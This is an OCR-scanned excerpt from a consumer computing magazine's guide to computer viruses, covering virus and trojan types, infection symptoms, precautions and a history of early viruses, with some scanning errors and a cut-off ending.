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Introduction 


Defend  Yourself 

Perhaps  the  single  most  dreaded  computing  experience  is 
when  you  find  that  your  PC  has  been  infected  with  a virus. 
Your  data  may  be  lost  forever,  and  you  can’t  keep  your 
computer  from  crashing  long  enough  to  fix  it.  More  often  than  not, 
you  end  up  wasting  precious  constructive  time  trying  to  undo  the 
damage  caused. 

The  sad  thing  is,  a majority  of  malicious  software  is  written  by 
some  of  the  most  brilliant  computer  minds  across  the  world.  Why,  is 
a question  best  left  unasked,  as  the  working  of  individual  human 
minds  is  too  varied  and  complicated  to  comprehend. 

This  month,  Digit  Fast  Track  will  take  you  through  the  world  of 
viruses.  You  will  find  eight  sections  in  this  book,  which  will  cover 
everything  you  need  to  know  about  viruses— from  what  viruses  are 
and  who  makes  them,  to  how  to  tell  when,  or  check  whether  or  not 
you  have  been  infected,  to  killing  the  viruses. 

Each  section  will  demystify  an  aspect  of  viruses  that  every  user 
should  know.  We  start  with  the  basics  in  Chapter  I— from  what  a 
virus  is,  how  it  works  and  the  different  types  of  viruses,  to  other 
types  of  malicious  software  and  how  to  tell  whether  you  have  been 
infected.  Chapter  Two  introduces  you  to  the  knights  in  shining 
armour,  called  antivirus  applications,  and  what  you  should  look  for 
when  trusting  one  to  defend  your  PC  and  your  data.  Chapter  Three 
will  give  you  a little  history  about  viruses;  Chapter  Four  details  the 
precautions  you  need  to  take  in  order  to  stay  safe  from  attack,  and 
Chapter  Five  taken  an  in  depth  look  at  the  best  security  software 
available  today. 

There  is  also  a special  White  Papers  section,  where  you  can  read 
some  of  the  best  literature  ever  written  on  this  subject.  There  is  also 
a Bibliography  that  recommends  some  excellent  virus-related 
reading,  both  for  the  beginner  and  the  expert,  as  well  as  a Glossary 
that  demystifies  hundreds  of  terms  that  may  confuse  you  when 
reading  about  viruses  or  anti-virus  technologies. 

We  hope  this  book  is  comprehensive  enough  to  help  the 
hundreds  and  thousands  of  readers  to  deal  with  and  plan  their 
security,  and  to  keep  their  precious  data  safe  from  the  millions  of 
threats  “out  there”. 
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The  Virus  Menace 


Viruses:  Know 
Your  Enemy 


You  need  to  know  your  enemies  before  you  can  attempt  to  defeat 
them.  This  section  will  give  you  an  indepth  look  at  what  a virus 
really  is,  and  how  they  work 

You  will  understand  to  differenciate  between  the  different  types 
of  malicious  code,  and  learn  how  to  tell  whether  your  computer  is 
infected  or  not. 
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1.1  What  is  a Vims? 


Life  as  we  know  it  today  would  be  handicapped  without  comput- 
ers. From  basic  communication,  finances  and  even  medical  sci- 
ence, computers  control  just  about  everything  that  life  in  a mod- 
ern society  depends  upon.  In  the  ideal  world,  man  would  respect 
such  power  and  work  towards  bettering  it  to  progression  as  a civil- 
isation. Unfortunately,  that  ideal  world  does  not  exist,  which  is 
why  great  breakthroughs  are  often  followed  by  people  who  are 
hell-bent  on  bringing  it  all  down.  These  people  only  see  weakness- 
es of  an  innovation  in  technology  and  will  go  any  lengths  to 
exploit  it,  simply  because  they  can.  These  are  the  people  who 
create  viruses. 

A computer  virus  can  be  defined  as  an  executable  program 
that  is  capable  of  infecting  other  computer  programs  by  modify- 
ing them  to  include  a copy  of  itself.  Just  the  way  people  can  spread 
the  common  cold  by  being  in  contact  with  other  people,  a com- 
puter virus  comes  in  contact  with  other  programs  to  ‘infect’  them. 
By  infecting  programs,  the  virus  is  capable  of  spreading  through 
an  entire  network  of  computers,  infecting  every  machine  that’s 
incapable  of  protecting  itself.  While  doing  so,  it  could  do  a world 
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of  damage  to  your  computer,  which  could  cost  you  dear.  The  dam- 
age could  consist  of  important  files  destroyed,  corrupted  data, 
slowing  down  of  the  infected  computer,  interrupted  or  unexpect- 
ed closing  of  important  programs,  or  it  could  be  any  or  all  of  these; 
and  chances  are  you  won’t  realise  that  your  computer  is  hit  by  a 
virus  until  it’s  much  too  late. 


Viruses  have  grown  in  number  and  evolved  in  nature  over  the 
past  decade.  Before  that,  it  was  quite  all  right  to  have  a basic  and 
even  outdated  anti-virus  program  on  your  computer,  which  would 
scan  floppies  or  CDs.  That  simple  task  would  qualify  as  protection 
at  the  time,  but  we  now  need  active  anti-virus  programs,  con- 
stantly running,  checking  every  file  you  download  or  execute. 


SEE  FAST  TRACK 
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1 .2  How  Viruses  Work 


There  are  tens  of  thousands  of  viruses  out  there,  and  new  ones  are 
discovered  every  day.  It  is  difficult  to  come  up  with  a generic  expla- 
nation of  how  viruses  work,  since  they  all  have  variations  in  the 
way  they  infect  or  the  way  they  spread.  So  instead,  we’ve  taken 
some  broad  categories  that  are  commonly  used  to  describe  various 
types  of  virus. 

File  Viruses  (Parasitic  Viruses) 

File  viruses  are  pieces  of  code  that  attach  themselves  to  executable 
files,  driver  files  or  compressed  files,  and  are  activated  when  the 
host  program  is  run.  After  activation,  the  virus  may  spread  itself 
by  attaching  itself  to  other  programs  in  the  system,  and  also  carry 
out  the  malevolent  activity  it  was  programmed  for.  Most  file  virus- 
es spread  by  loading  themselves  in  system  memory  and  looking 
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for  any  other  programs  located  on  the  drive.  If  it  finds  one,  it  mod- 
ifies the  program’s  code  so  that  it  contains  and  activates  the  virus 
the  next  time  it’s  run.  It  keeps  doing  this  over  and  over  until  it 
spreads  across  the  system,  and  possibly  to  other  systems  that  the 
infected  program  may  be  shared  with. 

Besides  spreading  themselves,  these  viruses  also  carry  some  type 
of  destructive  constituent  that  can  be  activated  immediately  or  by  a 
particular  ‘trigger’.  The  trigger  could  be  a specific  date,  or  the  num- 
ber of  times  the  virus  has  been  replicated,  or  anything  equally  triv- 
ial. Some  examples  of  file  viruses  are  Randex,  Meve  and  MrKlunky. 

Boot  Sector  Viruses 

A boot  sector  virus  affects  the  boot  sector  of  a hard  disk,  which  is 
a very  crucial  part.  The  boot  sector  is  where  all  information  about 
the  drive  is  stored,  along  with  a program  that  makes  it  possible 
for  the  operating  system  to  boot  up.  By  inserting  its  code  into  the 
boot  sector,  a virus  guarantees  that  it  loads  into  memory  during 
every  boot  sequence. 
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A boot  virus  does  not  affect  files;  instead,  it  affects  the  disks  that 
contain  them.  Perhaps  this  is  the  reason  for  their  downfall.  During 
the  days  when  programs  were  carried  around  on  floppies,  the  boot 
sector  viruses  used  to  spread  like  wildfire.  However,  with  the  CD- 
ROM  revolution,  it  became  impossible  to  infect  pre-written  data  on 
a CD,  which  eventually  stopped  such  viruses  from  spreading. 

Though  boot  viruses  still  exist,  they  are  rare  compared  to  new- 
age  malicious  software.  Another  reason  why  they’re  not  so  preva- 
lent is  that  operating  systems  today  protect  the  boot  sector,  which 
makes  it  difficult  for  them  to  thrive.  Examples  of  boot  viruses  are 
Polyboot.B  and  AntiEXE. 

Multipartite  Viruses 

Multipartite  viruses  are  a combination  of  boot  sector  viruses  and 
file  viruses.  These  viruses  come  in  through  infected  media  and 
reside  in  memory.  They  then  move  on  to  the  boot  sector  of  the 
hard  drive.  From  there,  the  virus  infects  executable  files  on  the 
hard  drive  and  spreads  across  the  system. 

There  aren’t  too  many  multipartite  viruses  in  existence  today, 
but  in  their  heyday,  they  accounted  for  some  major  problems  due 
to  their  capacity  to  combine  different  infection  techniques.  A sig- 
nificantly famous  multipartite  virus  is  Ywinz. 
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Macro  Viruses 

Macro  viruses  infect  files  that  are  created  using  certain  applica- 
tions or  programs  that  contain  macros.  These  include  Microsoft 
Office  documents  such  as  Word  documents,  Excel  spreadsheets, 
PowerPoint  presentations,  Access  databases,  and  other  similar 
application  files  such  as  Corel  Draw,  AmiPro,  etc. 

Since  macro  viruses  are  written  in  the  language  of  the  applica- 
tion, and  not  in  that  of  the  operating  system,  they  are  known  to  be 
platform-independent— they  can  spread  between  Windows,  Mac, 
and  any  other  system,  so  long  as  they’re  running  the  required  appli- 
cation. With  the  ever-increasing  capabilities  of  macro  languages  in 
applications,  and  the  possibility  of  infections  spreading  over  net- 
works, these  viruses  are  major  threats. 

The  first  macro  virus  was  written  for  Microsoft  Word  and  was 
discovered  back  in  August  1995.  Today,  there  are  thousands  of 
macro  viruses  in  existence— some  examples  are  Relax,  MelissaA 
and  Bablas. 
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Network  Viruses 

This  kind  of  virus  is  proficient  in  quickly  spreading  across  a Local 
Area  Network  (LAN)  or  even  over  the  Internet.  Usually,  it  propa- 
gates through  shared  resources,  such  as  shared  drives  and  folders. 


Once  it  infects  a new  system,  it  searches  for  potential  targets  by 
searching  the  network  for  other  vulnerable  systems.  Once  a new 
vulnerable  system  is  found,  the  network  virus  infects  the  other  sys- 
tem, and  thus  spreads  over  the  network.  Some  of  the  most  notori- 
ous network  viruses  are  Nirnda  and  SQLSlammer. 

E-mail  Viruses 

An  e-mail  virus  could  be  a form  of  a macro  virus  that  spreads  itself 
to  all  the  contacts  located  in  the  host’s  email  address  book.  If  any 
of  the  e-mail  recipients  open  the  attachment  of  the  infected  mail, 
It  spreads  to  the  new  host’s  address  book  contacts,  and  then  pro- 
ceeds to  send  itself  to  all  those  contacts  as  well.  These  days,  e-mail 
viruses  can  infect  hosts  even  if  the  infected  e-mail  is  previewed  in 
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a mail  client.  One  of  the  most  common  and  destructive  e-mail 
virus  is  the  ILOVEYOU  virus. 

There  are  many  ways  in  which  a virus  can  infect  or  stay  dor- 
mant on  your  PC.  However,  whether  active  or  dormant,  it’s  dan- 
gerous to  let  one  loose  on  your  system,  and  should  be  dealt  with 
immediately. 
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1.3  Other  Malicious  Software 

Earlier,  the  only  way  a computer  was  at  risk  was  when  you  insert- 
ed an  infected  floppy.  With  the  new  age  of  technology,  every  com- 
puter is  interconnected  to  the  rest  of  the  world  at  some  point  or 
the  other,  so  it’s  difficult  to  pinpoint  the  source  and/or  time  of  the 
infection.  As  if  that  weren’t  bad  enough,  new-age  computing  has 
also  brought  about  a new  breed  of  malicious  software.  Today,  the 
term  ‘virus’  has  become  a generic  term  used  for  all  the  different 
ways  that  your  computer  can  be  attacked  by  malicious  software. 
Besides  the  type  of  viruses  we  mentioned  in  Chapter  1.2,  here’s  a 
look  at  some  of  the  newer  problems  we  face  today. 

Trojan  Horses:  The  biggest  difference  between  a Trojan  horse— or 
Trojan— and  a virus  is  that  Trojans  don’t  spread  themselves.  Trojan 
horses  disguise  themselves  as  useful  software  available  for  down- 
load on  the  Internet,  and  naive  users  download  and  run  them  only 
to  realise  their  mistake  later. 

A Trojan  horse  is  usually  divided  into  two  parts— a server  and  a 
client.  It’s  the  client  that  is  cunningly  disguised  as  important  soft- 
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ware  and  placed  in  peer-to-peer  file  sharing  networks,  or  unoffi- 
cial download  sites.  Once  the  client  runs  on  your  system,  the 
attacker— the  person  running  the  server— has  a high  level  of  con- 
trol over  your  system,  which  can  lead  to  devastating  effects 
depending  on  the  attacker’s  intentions.  Trojan  horses  have  evolved 
to  a tremendous  level  of  sophistication,  which  makes  each  one  sig- 
nificantly different  from  the  other.  We  have  categorised  them 
roughly  into  the  following: 


o Remote  Access  Trojans:  These  are  the  most  commonly  available 
Trojans.  These  give  an  attacker  complete  control  over  the  vic- 
tim’s computers.  The  attacker  can  go  through  the  files  and 
access  any  personal  information  about  the  user  that  may  be 
stored  in  the  files,  such  as  credit  card  numbers,  passwords,  and 
important  financial  documents. 

o Password-sending  Trojans:  The  purpose  of  such  Trojans  is  to 
copy  all  cached  passwords  and  look  for  other  passwords  as  you 
enter  them,  and  send  them  to  specific  mail  address,  without 
the  user’s  knowledge.  Passwords  for  restricted  Web  sites,  mes 
saging  services,  FTP  services  and  e-mail  services  come  under 
direct  threat  with  this  kind  of  Trojan. 


o Destructive:  The  only  func- 
tion of  these  Trojans  is  to 
destroy  and  delete  files.  They 
can  automatically  delete  all 
the  core  system  files  on  your 
machine.  The  Trojan  could  be 


o Keyloggers:  These  log  victims’  keystrokes  and  then  send  the 
logs  to  the  attacker.  The 
attacker  then  searches  for 
passwords  or  other  sensitive 
data  in  the  log  files.  Most  of 
them  come  with  two  func- 
tions, such  as  online  and 
offline  recording.  Of  course, 
they  can  be  configured  to 
send  the  log  file  to  a specific 
e-mail  address  on  a daily 
basis. 
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controlled  by  the  attacker  or  could  be  programmed  to  strike  like  a 

logic  bomb-starting  on  a specific  day  or  at  specific  hour. 

o Denial  of  Service  (DoS)  Attack  Trojans:  The  main  idea  behind 
this  kind  of  Trojan  is  to  generate  a lot  of  Net  traffic  on  the 
victim’s  machine,  to  the  extent  that  the  Internet  connection  is 
too  overloaded  to  let  the  user  visit  a Web  site  or  download  any- 
thing. Another  variation  of  a DoS  Trojan  is  the  mail-bomb 
Trojan,  whose  main  aim  is  to  infect  as  many  machines  as  possi- 
ble and  simultaneously  attack  specific  e-mail  addresses  with 
random  subjects  and  contents  that  cannot  be  filtered. 

o Proxy/Wingate  Trojans:  These  types  of  Trojan  turn  the  victim’s 
computer  into  a proxy/wingate  server.  That  way,  the  infected 
computer  is  available  to  the  whole  world  to  be  used  for  anony- 
mous access  to  various  risky  Internet  services.  The  attacker  can 
register  domains  or  access  pornographic  Web  sites  with  stolen 
credit  cards  or  do  similar  illegal  activities  without  being  traced. 

o FTP  Trojans:  These  trojans  are  probably  the  most  simple,  and 
are  outdated.  The  only  thing  they  do  is  open  port  21— the  port 
for  FTP  transfers— and  let  everyone  connect  to  your  machine. 
Newer  versions  are  password-protected,  so  only  the  attacker  can 
connect  to  your  computer. 

o Software  Detection  Killers:  These  trojans  kill  popular 
antivirus/firewall  programs  that  protect  your  machine  to  give 
the  attacker  access  to  the  victim’s  machine. 


A trojan  could  have  any  one  or  a combination  of  the  above 
mentioned  functionalities. 

Worms:  Computer  Worms  are  programs  that  reproduce  and  run 
independently,  and  travel  across  network  connections.  The  main 
difference  between  viruses  and  worms  is  the  method  in  which 
they  reproduce  and  spread.  A virus  is  dependent  upon  a host  file 
or  boot  sector,  and  the  transfer  of  files  between  machines  to 
spread,  while  a worm  can  run  completely  independently  and 
spread  of  its  own  accord  through  network  connections. 
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The  security  threat  of  worms  is  equivalent  to  that  of  a virus. 
Worms  are  capable  of  doing  a whole  range  of  damage  such  as 
destroying  essential  files  in  your  system,  slowing  it  down  to  a great 
extent,  or  even  causing  some  essential  programs  to  crash.  Two 
famous  examples  of  worms  are  the  MS-Blaster  and  Sasser  worms. 

Spyware:  Spyware  is  the  new-age  term  for  advertising-supported 
software  (Adware).  Advertising  in  shareware  products  is  a way  for 
shareware  authors  to  make  money,  other  than  by  selling  it  to  the 
user.  There  are  several  large  media  companies  that  offer  to  place 
banner  ads  in  their  products  in  exchange  for  a portion  of  the 
revenue  from  banner  sales.  If  the  user  finds  the  banners  annoying, 
there  is  usually  an  option  to  get  rid  of  them  by  paying 
the  licensing  fee. 


~X 

x 


Unfortunately,  the  advertising  companies  often  also  install 
additional  tracking  software  on  your  system,  which  is  continu- 
ously using  your  Internet  connection  to  send  statistical  data  back 
to  the  advertisers.  While  the  privacy  policies  of  the  companies 
claim  there  will  be  no  sensitive  or  identifying  data  collected  from 
your  system  and  that  you  shall  remain  anonymous,  the  fact 
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remains  that  you  have  a server  sitting  on  your  PC  that  is  sending 
information  about  you  and  your  surfing  habits  to  a remote  loca- 
tion, using  your  bandwidth. 

Spyware  has  been  known  to  slow  down  computers  with  their 
semi-intensive  usage  of  processing  power,  bringing  up  annoying 
pop-up  windows  at  the  most  inappropriate  times  and  changing 
your  Internet  browsing  settings  such  as  your  home  page  or  default 
search  engine  to  their  own  services. 

Even  if  many  do  not  consider  this  illegal,  it  is  still  is  a major 
security  threat,  and  the  fact  that  there’s  no  way  to  get  rid  of  them 
makes  them  as  much  of  a nuisance  as  viruses. 

Logic  Bombs:  A logic  bomb  is  a program  which  has  deliberately 
been  written  or  modified  to  produce  results  when  certain  condi- 
tions are  met  that  are  unexpected  and  unauthorised  by  legitimate 
users  or  owners  of  the  software.  Logic  bombs  may  reside  within 
standalone  programs,  or  they  may  be  part  of  worms  or  viruses.  A 
variation  of  the  logic  bomb  is  the  time  bomb  that  ‘explodes’  at  a 
certain  time.  An  example  of  a time  bomb  is  the  infamous  ‘Friday 
the  13th’  virus. 
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There’s  never  really  a way  of  being  truly  protected  from  viruses, 
especially  when  your  computer  is  always  connected  to  some  form 
of  network.  There  are  chances  that  a virus  will  get  to  your  com- 
puter before  the  resident  anti-virus  program  is  even  aware  of  its 
existence.  Still,  there  are  ways  to  avoid  infection  by  following  a set 
of  simple  guidelines. 

o Make  sure  you  have  a clean  boot  CD  handy  at  all  times.  Your 
original  operating  system  installation  CD  should  be  bootable,  so 
that  will  do. 


o If  your  anti-virus  has  an  option  of  making  a bootable  CD,  take 
some  time  off  to  make  one  of  those.  You  will  appreciate  the 
effort  if  the  need  ever  arises. 
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o Use  a well-reputed  anti-virus  software  and  update  it  daily. 

o Make  sure  your  anti-virus  automatically  scans  any  newly  insert- 
ed discs  for  viruses,  especially  if  you  tend  to  exchange  data 
between  your  office  and  home  computers. 

o Avoid  opening  mails  with  attachments  unless  you’re  absolutely 
sure  they  are  from  trusted  sources. 

o If  you’re  using  an  e-mail  client  on  your  computer  such  as 
Microsoft  Outlook,  Outlook  Express  or  Mozilla  Thunderbird, 
disable  the  message  preview  pane.  This  way  you  can  filter  the 
messages  you  open  by  the  sender’s  name  or  the  subject  line. 

o Keep  all  your  documents  and  important  programs  backed  up  on 
a CD,  or  any  other  storage  media. 


Taking  these  steps  won’t  guarantee  that  you  stay  virus-free,  but 
you  will  surely  be  more  protected  and  prepared  for  a virus  attack. 
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1.5  Common  Symptoms  and  Precautions 


The  problem  about  virus  attacks  is  that  unless  your  anti-virus  tells 
you,  you  have  no  way  of  being  sure  that  your  computer  is  not 
infected.  Still,  there  are  a few  symptoms  that  you  should  look  out 
for.  These  include: 

o Your  computer  always  stops  responding  when  you  try  to  use  cer- 
tain software.  This  could  also  take  place  due  to  corruption  of  an 
essential  file  required  by  that  software. 

o You  received  an  e-mail  message  that  has  a strange  attachment. 
When  you  open  the  attachment,  dialog  boxes  appear,  or  a sud- 
den degradation  in  system  performance  occurs. 

o There  is  a double  extension  on  an  attachment  that  you  recently 
opened,  such  as  .jpg  .vbs  or  .gif.  exe. 

o An  anti-virus  program  is  disabled  for  no  reason  and  it  cannot  be 
restarted.  The  computer  may  not  allow  re-installation  of  the 
anti-virus. 
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o Strange  dialog  boxes  or  message  boxes  appear  on  the  screen. 

o Someone  tells  you  that  they  have  recently  received  e-mail  mes- 
sages from  you  containing  infected  attached  files,  and  you  are 
sure  you  never  sent  any  such  mails. 

o New  icons  that  you  did  not  place  on  the  Desktop  appear,  and  are 
not  associated  with  any  recently  installed  programs. 

o Strange  sounds  or  music  plays  from  your  speakers 
unexpectedly. 

o A program  disappears  from  the  computer,  and  you  didn’t 
uninstall  it. 

o Windows  will  not  start  because  certain  critical  system  files  are 
missing,  and  you  receive  error  messages  listing  those  files. 

o The  computer  starts  as  expected  some  of  the  time,  but  at 
other  times,  stops  responding  before  the  desktop  icons  and 
taskbar  appear. 

o The  computer  runs  very  slowly  and  it  takes  a long  time  to  start. 

o Out-of-memory  error  messages  appear,  even  though  your 
computer  has  plenty  of  RAM. 

o New  programs  do  not  install  properly. 

o Windows  restarts  unexpectedly. 

o Programs  that  used  to  run  now  stop  responding  frequently.  If 
you  try  to  remove  and  reinstall  the  software,  the  issue  contin- 
ues to  occur. 

o A partition  completely  disappears. 

Note  that  none  of  the  above  is  a sure-shot  sign  of  a virus  infec- 
tion. There  could  always  be  a software  glitch,  or  a loose  data 
cable,  or  even  mere  compatibility  issues  that  could  be  causing 
such  errors.  The  best  thing  to  do  is  always  keep  an  anti-virus 
installed  on  your  computer. 
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As  we  mentioned  above,  there  are  chances  that  the  erratic 
behaviour  may  not  even  be  a virus,  especially  if  it’s  not  detected 
by  the  resident  anti-virus.  Still,  to  be  safe,  run  a complete  virus 
scan  on  your  computer  with  the  latest  anti-virus  definitions  for 
the  installed  anti-virus  scanner.  If  you  don’t  have  an  anti-virus 
installed,  or  think  it  may  not  be  capable  of  detecting  the  virus, 
you  can  run  an  online  virus  scan  from  any  of  the  Web  sites  men- 
tioned in  Chapter  2.6. 


o If  a virus  is  detected,  use  the  steps  provided  in  Chapter  2.5  to  get 
rid  of  it.  In  case  you  feel  that  you  may  do  more  harm  than  good 
on  your  own,  and  might  prefer  to  have  an  expert  handling 
the  situation,  then  take  the  following  steps  as  a precautionary 
measure: 

o If  your  computer  is  connected  to  a network,  unplug  the  network 
cable  from  your  computer. 

o Switch  off  the  computer.  Use  the  proper  shutdown  sequence 
instead  of  simply  switching  off  the  power.  Using  an  infected 
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computer  may  simply  increase  the  chances  of  spreading  the  virus, 

or  may  give  the  virus  ample  time  to  do  its  damage. 

o Only  switch  the  computer  back  on  when  you  are  ready  to  rid  the 
computer  of  the  virus. 

o Advise  users  of  the  other  computers  on  the  network  to  scan 
their  machines,  just  to  make  sure  that  the  virus  hasn’t  spread 
there  already. 

o Make  sure  that  the  uninfected  computers  on  the  network  have 
some  protection  against  the  detected  virus.  This  should  be  con- 
sidered top  priority. 

o Do  not  share  CDs  or  DVDs  that  were  burnt  on  the  infected  PC 
without  scanning  them  for  viruses  first.  The  same  applies  for 
Zip  drives  or  any  other  writable  media  that  was  connected  to 
the  infected  computer  at  some  time. 


The  point  of  the  above  exercise  is  to  quarantine  the  infected  comput- 
er from  the  uninfected  ones  till  the  virus  problem  is  taken  care  of. 
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((  Thave  but  one  lamp  by  which  my  feet  are  guided,  and  that  is 
A the  lamp  of  experience.  I know  no  way  of  judging  the  future 
but  by  the  past.” 

— Edward  Gibbon 
British  Historian 

This  section  will  take  you  on  a trip  down  virus-memory  lane, 
and  also  give  you  an  insight  into  the  people  who  create  them. 
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3.1  A Brief  History  Of  Viruses 

In  this  book  we  have  studied  viruses  up  close  and  personal,  but  do 
we  know  their  entire  story?  Where  did  they  all  begin?  What  was 
the  purpose  behind  the  creation  of  the  very  first  virus?  What 
made  viruses  evolve  to  this  level?  For  answers  to  these  questions, 
we  need  to  look  at  the  history  computer  viruses. 

Once  Upon  a Time... 

The  when  and  the  where  of  the  very  first  virus  is  a little  fuzzy  to 
history.  The  first  program  which  showcased  properties  of  what 
we  now  call  viruses  was  called  Elk  Cloner,  a program  for  the 
then  popular  Apple  II;  this  was  in  1981.  Elk  Cloner  was  quite  the 
fairy-tale  character,  restricting  itself  to  a fairy  harmless  rhyme 
that  went  like  so: 

It  will  get  on  all  your  disks 
It  will  infiltrate  your  chips 
Yes  it’s  Cloner! 

It  will  stick  to  you  like  glue 
It  will  modify  RAM  too 
Send  in  the  Cloner! 

Evidently,  it  was  nothing  more  than  a programmer’s  prank. 

Then  the  world  moved  on  to  the  mid-’80s;  IBM  had  just  creat- 
ed this  little  thing  they  called  the  PC,  maybe  you  have  heard  of  it. 
It  was  about  the  time  when  viruses  started  humming  tunes  of  a 
more  destructive  nature.  One  of  the  first  PC  viruses  discovered 
was  known  as  the  Brain  virus,  written  by  two  brothers  residing  in 
Pakistan.  The  Brain  was  a boot-sector  virus,  infecting  360K  floppy 
disks,  but  not  hard  drives.  It  would  occupy  unused  space  on  a 
floppy  such  that  the  disk  would  become  useless.  Interestingly, 
Brain  was  also  the  first  “stealth”  virus,  hiding  itself  from  detec- 
tion: if  a computer  user  tried  to  view  the  disk  sector,  Brain  would 
display  the  original,  uninfected  boot  sector. 
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Alongside  Brain,  the  80’s  saw  other  major  viruses  such  as 
“Vienna”  and  “Cascade”.  This  twosome  created  something  of  an 
epidemic  between  1987-89.  PC  users  still  remember  those  days: 
letters  would  drop  from  displays  making  people  draw  the  obvious 
conclusion  that  there  was  something  wrong  with  their  monitors. 
It  wasn’t  the  best  of  times  if  your  job  description  involved  servic- 
ing monitors.  But  cascading  letters  weren’t  the  only  thing  infect- 
ed computers  would  display.  Some  would  start  playing  the 
“Yankee  Doodle”  number...  weird  times,  for  sure. 

With  viruses  suddenly  and  irritatingly  popping  up  from  the 
most  unlikely  of  sources,  the  time  was  now  for  saviours.  People 
were  desperate  for  solutions.  And  so  there  appeared  antidotes.  Like 
the  malady,  the  first  cure  is  hard  to  pinpoint.  Which  was  the  first 
antivirus,  is  difficult  to  identify  but  it  wasn’t  until  1990  that  a vis- 
ible number  of  solutions  were  introduced.  And  when  it  rained,  it 
poured.  Antivirus  solutions  were  aplenty,  including  software  from 
IBM,  McAfee,  Digital  Dispatch  and  Iris.  Only  a handful  of  them  have 
survived  to  this  day  and  even  fewer  grew  from  little  more  than  a 
garage  project  to  major  players  in  the  computer  security  market. 
Antivirus  software  had  arrived  and  not  a moment  too  soon. 

Come  1990  and  viruses  started  displaying  a variety  of  charac- 
teristics. These  included  Polymorphism— encrypted  viruses  where 
the  decryption  routine  code  was  variable,  Armoring— to  prevent 
antivirus  researchers  from  dissembling  a virus  and  Multipartite- 
able  to  infect  both  programs  and  boot  sectors. 

The  first  polymorphic  virus  was  called  “Chameleon”.  By  April 
1991,  everyone  was  taking  shots  of  “Tequila”— a virus  which  was 
Stealth,  Polymorphic  and  Multipartite;  a very  real  and  problemat- 
ic threat.  Suddenly,  viruses  became  a lot  more  threatening. 

After  Tequila,  the  idea  of  a self-encrypting,  polymorphic  virus 
gained  popularity  in  the  wrong  circles  and  spawned  a completely 
unique  software— a polymorphic  code  generator.  Creating  slippery 
viruses  was  now  much  simpler. 
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In  early  1992  the  famous  “Dedicated”  virus  appeared,  based 
on  the  first  known  polymorphic  generator,  the  MtE  and  the  first 
in  a series  of  MtE-based  viruses.  The  polymorphic  generator  was 
essentially  an  object  module  (OBJ)  file;  to  get  a polymorphic 
mutant  virus  from  a conventional  non-encrypting  virus  one 
only  needed  to  link  object  modules  together— the  polymorphic 
OBJ  file  and  the  virus  OBJ  file.  The  era  of  “script-kiddies”  had 
dawned  and  with  it  an  industry  of  do-it-yourself,  30-minute- 
viruses.  Soon  books  promising  to  teach  you  how  to  write  viruses 
in  weeks  made  their  appearance. 

The  Michelangelo  virus  was  the  first  media  darling.  Much  like 
the  Y2K  anti-climax,  Michelangelo  was  heralded  by  much  doom 
and  gloom  alerts,  with  predictions  of  massive,  worldwide  dam- 
ages. In  actuality,  very  little  happened!  The  same  year  the  Dark 
Avenger  Mutation  Engine  (DAME)  became  the  first  toolkit  that 
could  be  used  to  turn  any  virus  polymorphic.  By  1993,  polymor- 
phic viruses  were  populous  in  virus  land.  Some  celebrities  from 
that  era:  Bootache,  CivilWar,  Crusher,  Dudley,  Fly,  Freddy,  Ginger, 
Grog,  Haifa,  Moctezuma,  MVF,  Necros,  Nukehard,  PcFly,  Predator, 
Satanbug,  Sandra,  Shoker,  Todor,  Tremor,  Trigger  and  Uruguay. 

These  viruses  required  special  methods  of  detection,  includ- 
ing emulation  of  the  virus’s  executable  code  and  mathematical 
algorithms  for  restoring  parts  of  the  code  and  data  in  virus. 
Polymorphic  generators  were  also  proliferating  alongside  their 
progeny.  Several  new  ones  appeared  utilizing  complex  methods 
of  generating  polymorphic  code.  By  the  end  of  1993  there  were 
four  known  generators  of  polymorphic  code:  MTE  0.90 
(Mutation  Engine),  four  versions  of  TPE  (Trident  Polymorphic 
Engine),  NED  (Nuke  Encryption  Device)  and  DAME  (Dark  Angel’s 
Multiple  Encryptor). 

Generation  Next 

As  viruses  got  more  prominent,  the  means  to  create  them  kept 
getting  easier  and  sometime  in  the  middle  of  1992  appeared  the 
first  do-it-yourself  virus  kit.  July  5,  1992:  the  first  viral  code  con- 


!TTT  FAST  TRACK 


47 


Virus  History 


VIRUS  PROOF  YOUR  PC 


struction  set  for  IBM  PC  compatibles  called  VCL  (Virus  Creation 
Laboratory)  version  1.00  was  unleashed.  This  set  allowed  generat- 
ing well  commented  source  texts  of  viruses  in  the  form  or  assem- 
bly language  texts,  object  modules  and  infected  files  themselves. 

VCL  used  a standard  WIMP  interface— with  the  help  of  a menu 
system  one  could  choose  a virus  type,  the  types  of  files  to  infect 
(COM  or/and  EXE),  presence  or  absence  of  self-encryption,  meas- 
ures of  protection  from  debugging,  inside  text  strings,  plus  some 
10  additional  “effects”.  Viruses  could  now  use  a standard  method 
of  infecting  a file  by  adding  their  body  to  the  end  of  file,  or 
replace  files  with  their  body  destroying  the  original  content  of  a 
file,  or  become  companion  viruses.  A virus  creator  not  only  had 
the  tool  but  also  choice. 

These  generator  kits  kept  getting  better  and  the  27th  of  July  saw 
the  first  version  of  PS-MPC  (Phalcon/Skism  Mass-Produced  Code 
Generator).  This  set  used  a configuration  file  to  generate  viral 
source  code.  The  creator  file  contained  description  of  the  virus:  the 
type  of  infected  files  (COM  or  EXE);  resident  capabilities  (unlike  VCL, 
PS-MPC  could  also  produce  resident  viruses);  method  of  installing 
the  resident  copy  of  the  virus;  self  encryption  capabilities;  the  abil- 
ity to  infect  COMMAND.COM  and  lots  of  other  useful  information. 

As  time  went  by,  virus  construction  kits  got  smarter,  simpler 
and  more  effective.  Bad  news  for  the  rest  of  us— practically  every 
teenager  with  a bad  social  life  and  time  to  spare  was  churning 
viruses.  Over  the  years  there  have  been  several  hundreds  of  VCL 
and  G2  based  viruses  and  thousands  PS-MPC  based  viruses. 

In  1995,  Microsoft  released  the  revolutionary  Windows  95  and 
antivirus  companies  were  worried  that  nobody  would  need  them 
anymore.  The  most  common  viruses  were  still  boot  viruses  that 
worked  on  DOS,  but  wouldn’t  replicate  on  Windows  95.  Little  did 
they  know...  Sometime  the  same  year,  macro  viruses  appeared. 
These  viruses  worked  in  the  MS-Word  environment.  The  antivirus 
industry  would  keep  its  job. 
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The  first  macro  virus  went  by  the  name  “Concept”  and  it  was 
pretty  unchallenged.  Concept  soon  proliferated  to  thousands,  if 
not  millions  of  computers  in  no  time  it  all.  Data  exchange  in  the 
MS  Word  was  now  an  industry  standard,  to  get  infected  by 
Concept,  one  only  needed  to  open  a colleague’s  file,  soon  all  the 
documents  edited  by  this  newly  infected  copy  of  Word  would 
become  carriers  and  the  spiral  would  continue.  Adding  fuel  to  this 
fire  was  a little  thing  called  the  Internet.  The  reality  of  infecting 
